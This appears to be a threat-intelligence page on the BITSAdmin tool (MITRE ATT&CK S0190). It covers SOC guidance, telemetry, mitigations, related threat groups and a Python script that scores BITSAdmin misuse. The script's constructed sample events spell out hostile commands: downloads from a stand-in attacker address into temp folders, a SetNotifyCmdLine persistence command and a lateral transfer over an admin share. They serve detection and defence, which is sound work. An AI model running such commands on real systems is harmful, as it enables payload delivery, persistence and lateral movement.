S0190: BITSAdmin
Analyst context for executives and security teams
BITSAdmin matters because it is a legitimate Windows command-line tool that can create and manage BITS jobs, a Windows background transfer capability. Its defensive significance is not that the tool is inherently malicious, but that ATT&CK links it to BITS Jobs, ingress and lateral tool transfer, and exfiltration over unencrypted non-C2 protocols. For leaders, this is a classic “living off the land” coverage question: can the organization distinguish normal administrative or application-driven background transfers from suspicious use during an intrusion?
Executive priority
Prioritize BITSAdmin as a Windows monitoring and response-readiness issue rather than a standalone malware risk. Because ATT&CK relates multiple groups to this tool, and the related techniques span persistence, execution, command-and-control, lateral movement, and exfiltration, security leaders should ask whether SOC telemetry, incident response playbooks, and audit evidence cover BITS job creation and command-line use. The business value of the decision lies in validating visibility and acceptable-use boundaries for native Windows utilities that can bypass tool-focused control strategies.
Technical view
For SOC, detection engineering, and IR teams, validate visibility around BITSAdmin execution and BITS job activity on Windows endpoints. ATT&CK provides no official detection text for this software object, so local detection should be anchored in the relationships: BITSAdmin can be associated with BITS Jobs (T1197), tool/file transfer from external systems (T1105), transfer between internal systems (T1570), and exfiltration over unencrypted non-C2 protocols (T1048.003). Review command-line telemetry, process ancestry, job metadata, user context, destination/source locations, and network activity. Tune carefully because legitimate Windows administration and application update behavior may also use BITS-related mechanisms.
Likely telemetry
- Windows process creation events showing bitsadmin.exe execution and command-line arguments
- Parent/child process context for BITSAdmin and related command shells or administrative tools
- BITS job creation, modification, completion, and error records where available
- Windows service and endpoint activity associated with Background Intelligent Transfer Service
- Network connection and proxy/firewall logs for destinations contacted during BITS-related transfers
Detection direction
- Inventory where BITSAdmin is expected to be used in the environment and alert on use outside those baselines.
- Correlate BITSAdmin execution with BITS job activity, file writes, and network transfers rather than relying on process name alone.
- Tune for suspicious context: unusual users, unusual hosts, unexpected parent processes, external destinations, internal staging paths, or timing inconsistent with normal administration.
- Hunt for relationship-driven patterns: ingress tool transfer, lateral movement staging, persistence/execution via BITS jobs, and possible unencrypted non-C2 exfiltration.
- Account for false positives from legitimate administrators, update mechanisms, and background transfer workflows.
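The telemetry and detection directions above, turned into a scoring pass over constructed process-creation events. This is an added example, not code from the ATT&CK record or from Glexia; the trusted hosts, suspicious parent processes, weights, and sample events are assumptions to be replaced with your own baseline. It goes one step beyond the list by also catching BITS driven through the PowerShell `Start-BitsTransfer` cmdlet, which is what "rather than relying on process name alone" implies in practice.

```python
"""Score Windows process-creation events for BITSAdmin misuse.

Added example for this page; it is not part of the ATT&CK record or of any
vendor product. Events are constructed samples shaped like a Sysmon Event
ID 1 / Security 4688 record reduced to the fields the page lists as useful.
"""
import re
from urllib.parse import urlparse

# Assumption: hosts from which BITS downloads are expected in this environment.
TRUSTED_HOSTS = {"updates.corp.example", "wsus.corp.example"}
# Assumption: parent processes under which bitsadmin.exe is not expected here.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe",
                      "wscript.exe", "cscript.exe", "rundll32.exe"}
STAGING_DIR = re.compile(r"\\(temp|programdata|users\\public)\\", re.I)
URL_OR_UNC = re.compile(r"^(https?://\S+|\\\\[^\\]+\\\S+)$", re.I)

# Documented bitsadmin switches, the technique on this page each evidences,
# and an assumed weight (tune against your own baseline).
SWITCH_TAGS = {
    "/transfer": ("T1105", 1),
    "/addfile": ("T1105", 1),
    "/create": ("T1197", 1),
    "/setnotifycmdline": ("T1197 notify command", 4),
    "/setminretrydelay": ("T1197 retry tuning", 2),
    "/upload": ("T1048.003 upload job", 3),
}


def tokenize(cmdline):
    """Split a Windows command line, keeping a quoted argument as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return (score, tags, reasons); the score is additive so the alert
    threshold can be tuned per environment rather than hard-coded."""
    tokens = tokenize(event["command_line"])
    lowered = [t.lower() for t in tokens]
    score, tags, reasons = 0, set(), []

    if basename(event["image"]) == "bitsadmin.exe":
        for switch, (tag, weight) in SWITCH_TAGS.items():
            if switch in lowered:
                tags.add(tag)
                score += weight
    elif "start-bitstransfer" in event["command_line"].lower():
        # BITS driven through the PowerShell cmdlet: matching on the
        # bitsadmin.exe process name alone would miss this.
        tags.add("T1197 via PowerShell")
        score += 2
        reasons.append("BITS cmdlet outside bitsadmin.exe")
    else:
        return 0, set(), []

    for tok in tokens:
        if URL_OR_UNC.match(tok):
            if tok.startswith("\\\\"):          # SMB source or destination
                tags.add("T1570")
                score += 3
                reasons.append(f"UNC path {tok}")
            elif (urlparse(tok).hostname or "") not in TRUSTED_HOSTS:
                score += 3
                reasons.append(f"untrusted host {urlparse(tok).hostname}")
        elif STAGING_DIR.search(tok):
            score += 2
            reasons.append(f"staging path {tok}")

    parent = basename(event.get("parent_image", ""))
    if parent in SUSPICIOUS_PARENTS:
        score += 4
        reasons.append(f"unexpected parent {parent}")
    return score, tags, reasons


def ev(image, parent, cmd):
    return {"image": image, "parent_image": parent, "command_line": cmd}


# Constructed sample events (not real telemetry); 203.0.113.10 is a
# documentation address standing in for an attacker-controlled host.
SAMPLES = {
    "admin-deploy": ev(r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\cmd.exe",
        r"bitsadmin.exe /transfer deploy /download /priority normal "
        r"http://updates.corp.example/agent.msi C:\Deploy\agent.msi"),
    "office-download": ev(r"C:\Windows\System32\bitsadmin.exe",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        r"bitsadmin /transfer n /download /priority high "
        r"http://203.0.113.10/a.exe C:\Users\jdoe\AppData\Local\Temp\a.exe"),
    "notify-persistence": ev(r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\cmd.exe",
        r'bitsadmin /SetNotifyCmdLine backup cmd.exe "/c start C:\ProgramData\p.txt"'),
    "lateral-unc": ev(r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\cmd.exe",
        r"bitsadmin /transfer lat /download \\FS01\c$\Windows\Temp\t.exe C:\Windows\Temp\t.exe"),
    "ps-cmdlet": ev(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
        r"powershell.exe -NoP -c Start-BitsTransfer -Source http://203.0.113.10/x.bin -Destination C:\ProgramData\x.bin"),
    "unrelated": ev(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
}


def run_samples():
    """Triage every sample; returns {name: (score, sorted tags, reasons)}."""
    return {n: (s, sorted(t), r) for n, (s, t, r) in ((n, triage(e)) for n, e in SAMPLES.items())}


if __name__ == "__main__":
    for name, (score, tags, reasons) in run_samples().items():
        print(f"{name:18} score={score:2} tags={tags} reasons={reasons}")
```

Run as a script and the approved deployment from the internal update server scores 1 while the Office-spawned download to a user temp directory scores 10; a review threshold around 5 separates them on these samples, but the right cut-off depends on how noisy legitimate BITS use is in your own environment, so keep the weights and allowlists as tunables rather than constants.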
Mitigation priorities
- Define policy for legitimate BITSAdmin use on Windows systems and limit administrative use to approved roles and workflows.
- Ensure endpoint logging captures process command lines and BITS-related activity sufficient for investigation.
- Use least privilege and administrative access controls to reduce misuse of native transfer utilities.
- Monitor and control outbound network paths so background transfer activity is visible through proxy, firewall, or equivalent network logging.
- Include BITSAdmin and BITS Jobs in incident response triage checklists for Windows hosts involved in suspected transfer, persistence, or lateral movement activity.
Analyst notes and limits
The supplied ATT&CK record identifies BITSAdmin as a Windows command-line tool for creating and managing BITS Jobs. Its materiality comes from ATT&CK relationships to multiple techniques and several groups, not from any claim that BITSAdmin is malicious by itself. The group relationships show this tool appears in diverse threat contexts, including espionage and financially motivated activity, but local risk should be assessed against the organization’s Windows footprint, administrative practices, and telemetry maturity.
ATT&CK provides no official detection text for this object, no aliases, and no object-level tactics. Related technique descriptions include platforms beyond Windows, but the BITSAdmin software object itself is supplied as Windows-only. This take does not assert active exploitation, customer exposure, or detection coverage; those require local evidence.
BITSAdmin
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1570 | Lateral Tool Transfer | |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1197 | BITS Jobs | |
Groups, software, and campaigns
G0102: Wizard Spider
Wizard Spider is a Russia-based financially motivated threat group originally known for the creation and deployment of TrickBot since at least 2016. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.[1][2][3]
G0096: APT41
APT41 is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.[1] Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[2][3]
G1034: Daggerfly
Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.[1][2][3][4]
G1001: HEXANE
HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.[1][2][3][4]
G1054: MirrorFace
MirrorFace is a People's Republic of China (PRC)-aligned cyberespionage actor believed to be a subgroup under the menuPass umbrella based on targeting, tools, and infrastructure overlaps. MirrorFace has been active since at least 2019, at first exclusively targeting Japanese organizations across the media, defense, diplomatic, financial, manufacturing, and academic sectors. Subsequent MirrorFace operations included targets in Central Europe and featured use of LODEINFO, HiddenFace, and UPPERCUT malware.[1][2][3][4][5][6]
G0065: Leviathan
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.[1][2][3][4]
G1046: Storm-1811
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.[1][2][3][4]
G0081: Tropic Trooper
Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.[1][2][3]
G0137: Ferocious Kitten
Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.5 | | Current bundle | bbcd2b40f37d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
- [2] MITRE ATT&CK. S0190: BITSAdmin.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.